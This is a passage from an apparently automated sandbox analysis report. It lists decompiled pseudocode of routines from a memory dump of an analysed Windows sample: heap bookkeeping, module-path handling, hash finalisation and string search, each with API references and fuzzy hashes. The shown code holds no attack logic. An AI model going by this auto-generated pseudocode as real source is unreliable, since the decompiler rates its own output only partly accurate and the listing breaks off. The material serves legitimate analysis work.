                                        • Instruction ID: d9599fc45535091143a6c6d90f24f7a4421c9067fbe82f8b5596c7374082081c
                                        • Opcode Fuzzy Hash: 57e4544e620dfdff16d35c1b8385623b9670560eb717dfbfca16eb2407ae9eea
                                        • Instruction Fuzzy Hash: 7011C233144214BFC3015F69EC45AD7BBB9EF46752720843AF800972A0EB75A8418B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DF66, Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0040DF66(void* __ebp, void* _a4) {
				void _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t39;

				_t31 = _a4;
				_t30 =  *(_t31 + 8);
				if(_t30 == 0) {
					E0040DCFD(_t31);
					if( *((intOrPtr*)(_t31 + 0x1c)) != 0) {
						_t14 = _t31 + 0x20; // 0x20
						 *0x4175b4(_t14);
					}
					return HeapFree( *0x418068, 0, _t31);
				}
				 *0x41750c(0x418684, __ebp);
				 *((intOrPtr*)( *(_t31 + 8) + 0x14)) =  *((intOrPtr*)( *(_t31 + 8) + 0x14)) - 1;
				if( *((intOrPtr*)( *(_t31 + 8) + 0x14)) <= 0) {
					 *(_t31 + 8) =  *(_t31 + 8) & 0x00000000;
					E0040DF66(0x418684, _t31);
					_t28 =  *_t30;
					if(_t28 != 0) {
						 *(_t28 + 4) =  *(_t30 + 4);
					}
					_t29 =  *(_t30 + 4);
					if(_t29 != 0) {
						 *_t29 =  *_t30;
					}
					_t39 =  *0x418680 - _t30; // 0x2160fa8
					if(_t39 == 0) {
						 *0x418680 =  *_t30;
					}
					HeapFree( *0x418068, 0, _t30);
				}
				return  *0x417514(0x418684);
			}








                                        0x0040df67
                                        0x0040df6c
                                        0x0040df71
                                        0x0040dfd9
                                        0x0040dfe2
                                        0x0040dfe4
                                        0x0040dfe8
                                        0x0040dfe8
                                        0x00000000
                                        0x0040dff7
                                        0x0040df7a
                                        0x0040df83
                                        0x0040df8d
                                        0x0040df8f
                                        0x0040df94
                                        0x0040df99
                                        0x0040df9d
                                        0x0040dfa2
                                        0x0040dfa2
                                        0x0040dfa5
                                        0x0040dfaa
                                        0x0040dfae
                                        0x0040dfae
                                        0x0040dfb0
                                        0x0040dfb6
                                        0x0040dfba
                                        0x0040dfba
                                        0x0040dfc8
                                        0x0040dfc8
                                        0x00000000

                                        APIs
                                        • RtlEnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3), ref: 0040DF7A
                                        • RtlLeaveCriticalSection.KERNEL32(00418684,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040DFCF
                                          • Part of subcall function 0040DF66: HeapFree.KERNEL32(00000000,?,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004), ref: 0040DFC8
                                        • RtlDeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3), ref: 0040DFE8
                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200), ref: 0040DFF7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                        • String ID:
                                        • API String ID: 3171405041-0
                                        • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                                        • Instruction ID: 851eab907e55d3a000d75d50b3a41472f434cea9439f8edf3e43bdf77a3ba7b9
                                        • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                                        • Instruction Fuzzy Hash: 3B112871505606AFD7209F55EC08B97BBB5FF49301F14C43EF50AA3AA0CB38A949CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409638, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E00409638(void* __eflags, intOrPtr _a4) {
				int _t9;
				void* _t18;
				signed int _t19;

				_t18 = E0040E8A0(0x104, _a4);
				_t19 = GetModuleFileNameW( *0x41806c, _t18, 0x104);
				_t9 = wcscmp(_t18, L"\\\\?\\");
				_pop(_t17);
				if(_t9 == 0) {
					_t17 = _t19 * 2 - 8;
					_t4 = _t18 + 8; // 0x8
					memmove(_t18, _t4, _t19 * 2 - 8);
					_t19 = _t19 - 4;
				}
				E0040E9F0(_t17, 0x104 - _t19);
				 *((short*)(_t18 + _t19 * 2)) = 0;
				return 0;
			}






                                        0x0040964b
                                        0x00409660
                                        0x00409662
                                        0x00409668
                                        0x0040966b
                                        0x0040966d
                                        0x00409675
                                        0x0040967a
                                        0x00409682
                                        0x00409682
                                        0x00409688
                                        0x0040968f
                                        0x00409696

                                        APIs
                                          • Part of subcall function 0040E8A0: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E8AC
                                          • Part of subcall function 0040E8A0: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E907
                                        • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                        • wcscmp.MSVCRT ref: 00409662
                                        • memmove.MSVCRT ref: 0040967A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                        • String ID: \\?\
                                        • API String ID: 2309408642-4282027825
                                        • Opcode ID: 958159e4334ecc1d5ff34775ef44926f9e9641b9048374454ee135295704e91c
                                        • Instruction ID: 930d2c6fe66db0f5e660fe16786a865cbb11eda2bbc26f24ea397abbf8bebd15
                                        • Opcode Fuzzy Hash: 958159e4334ecc1d5ff34775ef44926f9e9641b9048374454ee135295704e91c
                                        • Instruction Fuzzy Hash: BFF0E2B31002007AD2006777DC85CAB7AACEF853B47504A3FF415E2492EA38982496B8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B856, Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0040B856(intOrPtr _a4, void* _a8) {
				void _v8;
				intOrPtr _t42;
				void* _t43;
				void* _t46;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t52;
				void* _t54;

				_t52 = _a8;
				_t49 = 0;
				do {
					_t43 = 3;
					asm("sbb eax, eax");
					 *((char*)(_t54 + _t49 + 0x10)) =  *(_t52 + 0x14 +  ~(_t49 & 0x00000003) * 4) >> _t43 - (_t49 & 0x00000003) << 3;
					_t49 = _t49 + 1;
				} while (_t49 < 8);
				_push(1);
				_push(0x4136f0);
				_push(_t52);
				E0040CC56();
				_t51 = _t52 + 0x14;
				while(1) {
					_t54 = _t54 + 0xc;
					if(( *_t51 & 0x000001f8) == 0x1c0) {
						break;
					}
					_push(1);
					_push(0x4136f4);
					_push(_t52);
					E0040CC56();
				}
				_push(8);
				_push( &_v8);
				_push(_t52);
				E0040CC56();
				_t42 = _a4;
				_t50 = 0;
				do {
					_t46 = 3;
					 *((char*)(_t50 + _t42)) =  *(_t52 + (_t50 >> 2) * 4) >> _t46 - (_t50 & 0x00000003) << 3;
					_t50 = _t50 + 1;
				} while (_t50 < 0x14);
				memset(_t52 + 0x1c, 0, 0x40);
				memset(_t52, 0, 0x14);
				memset(_t51, 0, 8);
				memset( &_v8, 0, 8);
				return memset(_t52 + 0x60, 0, 0x40);
			}












                                        0x0040b85b
                                        0x0040b862
                                        0x0040b864
                                        0x0040b86b
                                        0x0040b874
                                        0x0040b87e
                                        0x0040b882
                                        0x0040b883
                                        0x0040b888
                                        0x0040b88a
                                        0x0040b88f
                                        0x0040b890
                                        0x0040b895
                                        0x0040b8ac
                                        0x0040b8ae
                                        0x0040b8b8
                                        0x00000000
                                        0x00000000
                                        0x0040b89f
                                        0x0040b8a1
                                        0x0040b8a6
                                        0x0040b8a7
                                        0x0040b8a7
                                        0x0040b8ba
                                        0x0040b8c0
                                        0x0040b8c1
                                        0x0040b8c2
                                        0x0040b8c7
                                        0x0040b8ce
                                        0x0040b8d0
                                        0x0040b8d7
                                        0x0040b8e7
                                        0x0040b8ea
                                        0x0040b8eb
                                        0x0040b8f7
                                        0x0040b900
                                        0x0040b909
                                        0x0040b916
                                        0x0040b930

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                                        • Instruction ID: 2fc7f671e3d41d3127596a6d06fe158c69863af97a695ce72f99efee0520fd28
                                        • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                                        • Instruction Fuzzy Hash: 5521C1727507082AE524AA29DC86F9F738CDB82708F50463EF241BA2C1DA79A54546AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405B40, Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405B40() {
				void* _t52;
				signed int _t62;
				void _t63;
				void* _t65;
				signed int _t67;
				void* _t68;
				signed int _t76;
				void* _t78;
				long _t81;
				signed int _t82;
				wchar_t* _t84;
				signed int _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				wchar_t* _t93;
				void* _t95;
				int _t97;
				wchar_t* _t98;
				void* _t100;

				_t93 =  *(_t100 + 0x20);
				if(_t93 == 0) {
					_t82 = 0;
					L5:
					_t52 = E0040E820(_t86, _t93);
					_t95 =  *(_t100 + 0x24);
					 *(_t100 + 0x24) = _t52;
					 *(_t100 + 0x28) = E0040E820(_t86, _t95);
					_t98 = E0040E8A0(_t82,  *((intOrPtr*)(_t100 + 0x34)));
					_t55 =  *(_t100 + 0x20);
					if( *(_t100 + 0x20) != 0) {
						_t93 = E0040E970(_t86, _t55);
					}
					_t56 =  *(_t100 + 0x24);
					if( *(_t100 + 0x24) != 0) {
						_t95 = E0040E970(_t86, _t56);
					}
					 *(_t100 + 0x18) = _t98;
					if(_t93 == 0 ||  *_t93 == 0) {
						L38:
						E0040E9F0(_t86, _t82 - (_t98 -  *(_t100 + 0x18) >> 1));
						 *_t98 = 0;
						return 0;
					} else {
						if(_t95 == 0 ||  *_t95 == 0) {
							_t86 = _t98 - _t93;
							do {
								_t62 =  *_t93 & 0x0000ffff;
								_t93 =  &(_t93[0]);
								 *(_t86 + _t93 - 2) = _t62;
							} while (_t62 != 0);
							_t98 = _t98 + _t82 * 2;
							goto L38;
						} else {
							_t88 = _t95;
							 *(_t100 + 0x14) = _t93;
							_t11 = _t88 + 2; // 0x2
							_t90 = _t11;
							do {
								_t63 =  *_t88;
								_t88 = _t88 + 2;
							} while (_t63 != 0);
							_t86 = _t88 - _t90 >> 1;
							 *(_t100 + 0x20) = _t86;
							if( *(_t100 + 0x24) == 0) {
								 *(_t100 + 0x10) =  *(_t100 + 0x2c);
								L20:
								 *((intOrPtr*)(_t100 + 0x34)) = 0x40530d;
								if(( *(_t100 + 0x28) & 0x00000001) == 0) {
									 *((intOrPtr*)(_t100 + 0x34)) = L004052F5;
								}
								_t65 =  *(_t100 + 0x2c);
								if(_t65 > 1) {
									wcsncpy(_t98, _t93, _t65 - 1);
									_t76 =  *(_t100 + 0x38);
									_t100 = _t100 + 0xc;
									_t98 = _t98 + _t76 * 2 + 0xfffffffe;
									_t93 = _t93 + _t76 * 2 + 0xfffffffe;
								}
								if( *_t93 == 0) {
									L30:
									if( *(_t100 + 0x24) != 0) {
										HeapFree( *0x418068, 0,  *(_t100 + 0x10));
									}
									goto L38;
								} else {
									_t67 =  *(_t100 + 0x20);
									do {
										_t68 =  *((intOrPtr*)(_t100 + 0x40))(_t93, _t95, _t67);
										_t100 = _t100 + 0xc;
										if(_t68 != 0) {
											 *_t98 =  *_t93;
											_t98 =  &(_t98[0]);
											_t67 =  *(_t100 + 0x20);
											_t93 =  &(_t93[0]);
											goto L33;
										}
										_t67 =  *(_t100 + 0x20);
										_t86 =  *(_t100 + 0x30);
										_t93 = _t93 + _t67 * 2;
										if(_t86 == 0xffffffff) {
											goto L33;
										}
										_t86 = _t86 - 1;
										 *(_t100 + 0x30) = _t86;
										if(_t86 > 0) {
											goto L33;
										}
										_t97 = _t82 - (_t93 -  *(_t100 + 0x14) >> 1);
										wcsncpy(_t98, _t93, _t97);
										_t100 = _t100 + 0xc;
										_t98 = _t98 + _t97 * 2;
										goto L30;
										L33:
									} while ( *_t93 != 0);
									goto L30;
								}
							}
							_t78 = RtlAllocateHeap( *0x418068, 0, 2 + _t86 * 2);
							 *(_t100 + 0x10) = _t78;
							_t92 = _t78 - _t95;
							do {
								_t86 =  *_t95 & 0x0000ffff;
								_t95 = _t95 + 2;
								 *(_t92 + _t95 - 2) = _t86;
							} while (_t86 != 0);
							_t95 = _t78;
							goto L20;
						}
					}
				}
				_t84 = _t93;
				_t86 =  &(_t84[0]);
				do {
					_t81 =  *_t84;
					_t84 =  &(_t84[0]);
				} while (_t81 != 0);
				_t82 = _t84 - _t86 >> 1;
				goto L5;
			}























                                        0x00405b47
                                        0x00405b4d
                                        0x00405b65
                                        0x00405b67
                                        0x00405b68
                                        0x00405b6d
                                        0x00405b72
                                        0x00405b7f
                                        0x00405b89
                                        0x00405b8b
                                        0x00405b91
                                        0x00405b99
                                        0x00405b99
                                        0x00405b9b
                                        0x00405ba1
                                        0x00405ba9
                                        0x00405ba9
                                        0x00405bab
                                        0x00405bb1
                                        0x00405d14
                                        0x00405d1f
                                        0x00405d28
                                        0x00405d31
                                        0x00405bc1
                                        0x00405bc3
                                        0x00405cfb
                                        0x00405d00
                                        0x00405d00
                                        0x00405d03
                                        0x00405d06
                                        0x00405d0b
                                        0x00405d10
                                        0x00000000
                                        0x00405bd3
                                        0x00405bd3
                                        0x00405bd5
                                        0x00405bd9
                                        0x00405bd9
                                        0x00405be0
                                        0x00405be0
                                        0x00405be3
                                        0x00405be6
                                        0x00405bed
                                        0x00405bf4
                                        0x00405bf8
                                        0x00405c38
                                        0x00405c3c
                                        0x00405c41
                                        0x00405c49
                                        0x00405c4b
                                        0x00405c4b
                                        0x00405c53
                                        0x00405c5a
                                        0x00405c60
                                        0x00405c65
                                        0x00405c69
                                        0x00405c73
                                        0x00405c76
                                        0x00405c76
                                        0x00405c7d
                                        0x00405cc5
                                        0x00405cca
                                        0x00405cd8
                                        0x00405cd8
                                        0x00000000
                                        0x00405c7f
                                        0x00405c7f
                                        0x00405c83
                                        0x00405c86
                                        0x00405c8a
                                        0x00405c8f
                                        0x00405ce3
                                        0x00405ce7
                                        0x00405cea
                                        0x00405cee
                                        0x00000000
                                        0x00405cee
                                        0x00405c91
                                        0x00405c95
                                        0x00405c99
                                        0x00405c9f
                                        0x00000000
                                        0x00000000
                                        0x00405ca1
                                        0x00405ca2
                                        0x00405ca8
                                        0x00000000
                                        0x00000000
                                        0x00405cb4
                                        0x00405cb9
                                        0x00405cbe
                                        0x00405cc1
                                        0x00000000
                                        0x00405cf1
                                        0x00405cf1
                                        0x00000000
                                        0x00405cf7
                                        0x00405c7d
                                        0x00405c0a
                                        0x00405c12
                                        0x00405c16
                                        0x00405c20
                                        0x00405c20
                                        0x00405c23
                                        0x00405c26
                                        0x00405c2b
                                        0x00405c30
                                        0x00000000
                                        0x00405c30
                                        0x00405bc3
                                        0x00405bb1
                                        0x00405b4f
                                        0x00405b51
                                        0x00405b54
                                        0x00405b54
                                        0x00405b57
                                        0x00405b5a
                                        0x00405b61
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeapwcsncpy
                                        • String ID:
                                        • API String ID: 1358295784-0
                                        • Opcode ID: 0b6d022b4b3ec67275b7dc9905891befcce50d12c46497f93e4d9ca557a7be6d
                                        • Instruction ID: 4cced55724abea2df4c6aa3b5a565e10871a7eff129148e4057415d9b0d0a386
                                        • Opcode Fuzzy Hash: 0b6d022b4b3ec67275b7dc9905891befcce50d12c46497f93e4d9ca557a7be6d
                                        • Instruction Fuzzy Hash: 2551BE305087059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DB9F, Relevance: 6.1, APIs: 4, Instructions: 134memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0040DB9F(char _a4) {
				intOrPtr _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				signed int _t80;
				signed int _t83;
				intOrPtr _t85;
				signed int _t86;
				intOrPtr _t87;
				long _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;

				_t90 = _a4;
				_t89 = 0;
				_t93 = 0;
				if( *((intOrPtr*)(_t90 + 0x1c)) != 0) {
					 *0x41750c(_t90 + 0x20);
					_t89 = 0;
				}
				_t91 =  *((intOrPtr*)(_t90 + 4));
				if(_t91 == 0) {
					_t80 =  *(_t90 + 0xc) >> 0x00000004 & 0xfffffff0;
					if(_t80 >=  *(_t90 + 0x14)) {
						if(_t80 >  *(_t90 + 0x18)) {
							_t80 =  *(_t90 + 0x18);
						}
					} else {
						_t80 =  *(_t90 + 0x14);
					}
					_t92 = RtlAllocateHeap( *0x418068, _t89,  *(_t90 + 0x10) * _t80 + 0x18);
					_t83 = 1;
					if(_t92 == 0) {
						_t92 = RtlAllocateHeap( *0x418068, 0,  *(_t90 + 0x10) + 0x18);
						if(_t92 == 0) {
							_t89 = 0;
							goto L30;
						}
						_t83 = 1;
						 *(_t92 + 0xc) = 1;
						goto L23;
					} else {
						 *(_t92 + 0xc) = _t80;
						L23:
						_t89 = 0;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) +  *(_t92 + 0xc);
						 *((intOrPtr*)(_t92 + 0x10)) = _t83;
						 *((intOrPtr*)(_t92 + 0x14)) = 0;
						 *((intOrPtr*)(_t92 + 8)) = 0;
						if( *(_t92 + 0xc) <= _t83) {
							 *_t92 =  *_t90;
							 *((intOrPtr*)(_t92 + 4)) = 0;
							 *_t90 = _t92;
						} else {
							 *_t92 =  *((intOrPtr*)(_t90 + 4));
							 *((intOrPtr*)(_t92 + 4)) = 0;
							 *((intOrPtr*)(_t90 + 4)) = _t92;
						}
						_t63 =  *_t92;
						if(_t63 != 0) {
							 *((intOrPtr*)(_t63 + 4)) = _t92;
						}
						_t46 = _t92 + 0x18; // 0x18
						_t93 = _t46;
						L30:
						goto L31;
					}
				} else {
					_t85 =  *((intOrPtr*)(_t91 + 0x14));
					if(_t85 <= 0) {
						_t86 =  *(_t91 + 0x10);
						_t93 = _t91 + 0x18 +  *(_t90 + 0x10) * _t86;
						_t13 = _t86 + 1; // 0x1
						 *(_t91 + 0x10) = _t13;
					} else {
						_t93 =  *((intOrPtr*)(_t91 + 8));
						 *((intOrPtr*)(_t91 + 8)) =  *_t93;
						_t8 = _t85 - 1; // -1
						 *((intOrPtr*)(_t91 + 0x14)) = _t8;
					}
					if( *((intOrPtr*)(_t91 + 0x14)) == _t89 &&  *(_t91 + 0x10) >=  *((intOrPtr*)(_t91 + 0xc))) {
						_t87 =  *_t91;
						if(_t87 != 0) {
							 *(_t87 + 4) =  *(_t91 + 4);
						}
						_t69 =  *_t91;
						if(_t91 !=  *((intOrPtr*)(_t90 + 4))) {
							 *( *(_t91 + 4)) = _t69;
						} else {
							 *((intOrPtr*)(_t90 + 4)) = _t69;
						}
						 *_t91 =  *_t90;
						 *(_t91 + 4) = _t89;
						 *_t90 = _t91;
						_t71 =  *_t91;
						if(_t71 != 0) {
							 *((intOrPtr*)(_t71 + 4)) = _t91;
						}
					}
					L31:
					if( *((intOrPtr*)(_t90 + 0x1c)) != _t89) {
						 *0x417514(_t90 + 0x20);
					}
					if(_t93 == 0) {
						return 0;
					} else {
						 *_t93 = _t92;
						_t49 =  &_a4; // 0x4
						return _t49;
					}
				}
			}
















                                        0x0040dba2
                                        0x0040dba6
                                        0x0040dba8
                                        0x0040dbad
                                        0x0040dbb3
                                        0x0040dbb9
                                        0x0040dbb9
                                        0x0040dbbb
                                        0x0040dbc0
                                        0x0040dc42
                                        0x0040dc48
                                        0x0040dc52
                                        0x0040dc54
                                        0x0040dc54
                                        0x0040dc4a
                                        0x0040dc4a
                                        0x0040dc4a
                                        0x0040dc70
                                        0x0040dc72
                                        0x0040dc75
                                        0x0040dc91
                                        0x0040dc95
                                        0x0040dcd7
                                        0x00000000
                                        0x0040dcd7
                                        0x0040dc99
                                        0x0040dc9a
                                        0x00000000
                                        0x0040dc77
                                        0x0040dc77
                                        0x0040dc9d
                                        0x0040dca0
                                        0x0040dca2
                                        0x0040dca5
                                        0x0040dca8
                                        0x0040dcab
                                        0x0040dcb1
                                        0x0040dcc2
                                        0x0040dcc4
                                        0x0040dcc7
                                        0x0040dcb3
                                        0x0040dcb6
                                        0x0040dcb8
                                        0x0040dcbb
                                        0x0040dcbb
                                        0x0040dcc9
                                        0x0040dccd
                                        0x0040dccf
                                        0x0040dccf
                                        0x0040dcd2
                                        0x0040dcd2
                                        0x0040dcd9
                                        0x00000000
                                        0x0040dcd9
                                        0x0040dbc2
                                        0x0040dbc2
                                        0x0040dbc7
                                        0x0040dbda
                                        0x0040dbe6
                                        0x0040dbe8
                                        0x0040dbeb
                                        0x0040dbc9
                                        0x0040dbc9
                                        0x0040dbcf
                                        0x0040dbd2
                                        0x0040dbd5
                                        0x0040dbd5
                                        0x0040dbf1
                                        0x0040dc03
                                        0x0040dc07
                                        0x0040dc0c
                                        0x0040dc0c
                                        0x0040dc0f
                                        0x0040dc14
                                        0x0040dc1e
                                        0x0040dc16
                                        0x0040dc16
                                        0x0040dc16
                                        0x0040dc22
                                        0x0040dc24
                                        0x0040dc27
                                        0x0040dc29
                                        0x0040dc2d
                                        0x0040dc33
                                        0x0040dc33
                                        0x0040dc2d
                                        0x0040dcda
                                        0x0040dcdd
                                        0x0040dce3
                                        0x0040dce3
                                        0x0040dceb
                                        0x00000000
                                        0x0040dced
                                        0x0040dced
                                        0x0040dcf0
                                        0x00000000
                                        0x0040dcf0
                                        0x0040dceb

                                        APIs
                                        • RtlEnterCriticalSection.KERNEL32(?,?,?,00000000,0040A6C4,00000000,00000001,?,?,?,00000000,0040A4EC,?,?,00000000,?), ref: 0040DBB3
                                        • RtlAllocateHeap.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A6C4,00000000,00000001,?,?,?,00000000,0040A4EC,?,?), ref: 0040DC68
                                        • RtlAllocateHeap.KERNEL32(00000000,-00000018,?,?,00000000,0040A6C4,00000000,00000001,?,?,?,00000000,0040A4EC,?,?,00000000), ref: 0040DC8B
                                        • RtlLeaveCriticalSection.KERNEL32(?,?,00000000,0040A6C4,00000000,00000001,?,?,?,00000000,0040A4EC,?,?,00000000,?,?), ref: 0040DCE3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateCriticalHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3625150316-0
                                        • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                                        • Instruction ID: 0ba823b5fe5a23aad1261cc5af023cbdec4b672926e48f22c8859cbc9c6aa440
                                        • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                                        • Instruction Fuzzy Hash: 635103B0A08B069FD324CF69D980922B7F4FF587103108A3EE49AD7A90D374F959CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406610, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00406610() {
				WCHAR* _t16;
				signed short _t19;
				WCHAR* _t20;
				signed short* _t25;
				signed short _t27;
				signed int _t31;
				signed int _t32;
				signed short* _t33;
				signed short* _t34;
				signed short* _t36;
				signed short* _t42;
				signed short* _t44;
				signed short* _t45;
				signed int _t47;
				WCHAR* _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x24);
				_t16 =  *_t44 & 0x0000ffff;
				_t45 =  &(_t44[1]);
				 *(_t49 + 0x2c) = _t45;
				if(_t16 == 0) {
					return  *(_t49 + 0x28);
				} else {
					_t31 = CharLowerW(_t16) & 0x0000ffff;
					_t33 =  &(_t45[1]);
					 *(_t49 + 0x1c) = _t31;
					do {
						_t19 =  *_t45;
						_t45 =  &(_t45[1]);
					} while (_t19 != 0);
					_t42 =  *(_t49 + 0x28);
					_t47 = _t45 - _t33 >> 1;
					 *(_t49 + 0x18) = _t47;
					while(1) {
						_t20 =  *_t42 & 0x0000ffff;
						_t42 =  &(_t42[1]);
						if(_t20 == 0) {
							break;
						}
						if(CharLowerW(_t20) != _t31) {
							continue;
						} else {
							_t36 =  *(_t49 + 0x2c);
							_t32 = _t47;
							_t34 = _t36;
							if(_t47 == 0) {
								L13:
								return _t42 - 2;
							} else {
								_t25 = _t42 - _t36;
								 *(_t49 + 0x14) = _t25;
								while(1) {
									_t48 =  *(_t25 + _t34) & 0x0000ffff;
									 *(_t49 + 0x14) =  &(_t34[1]);
									_t27 = CharLowerW( *_t34 & 0x0000ffff);
									if((CharLowerW(_t48) & 0x0000ffff) != (_t27 & 0x0000ffff)) {
										break;
									}
									if(_t48 == 0) {
										goto L13;
									} else {
										_t32 = _t32 - 1;
										if(_t32 == 0) {
											goto L13;
										} else {
											_t34 =  *(_t49 + 0x10);
											_t25 =  *(_t49 + 0x14);
											continue;
										}
									}
									goto L16;
								}
								_t47 =  *(_t49 + 0x18);
								_t31 =  *(_t49 + 0x1c);
								continue;
							}
						}
						goto L16;
					}
					return 0;
				}
				L16:
			}



















                                        0x00406615
                                        0x0040661b
                                        0x0040661f
                                        0x00406622
                                        0x00406629
                                        0x004066fe
                                        0x0040662f
                                        0x00406638
                                        0x0040663b
                                        0x0040663e
                                        0x00406642
                                        0x00406642
                                        0x00406646
                                        0x00406649
                                        0x0040664e
                                        0x00406654
                                        0x00406656
                                        0x00406660
                                        0x00406660
                                        0x00406663
                                        0x00406669
                                        0x00000000
                                        0x00000000
                                        0x00406675
                                        0x00000000
                                        0x00406677
                                        0x00406677
                                        0x0040667b
                                        0x0040667d
                                        0x00406681
                                        0x004066da
                                        0x004066e6
                                        0x00406683
                                        0x00406685
                                        0x00406687
                                        0x00406690
                                        0x00406690
                                        0x0040669b
                                        0x0040669f
                                        0x004066b0
                                        0x00000000
                                        0x00000000
                                        0x004066b5
                                        0x00000000
                                        0x004066b7
                                        0x004066b7
                                        0x004066b8
                                        0x00000000
                                        0x004066ba
                                        0x004066c0
                                        0x004066c4
                                        0x00000000
                                        0x004066c4
                                        0x004066b8
                                        0x00000000
                                        0x004066b5
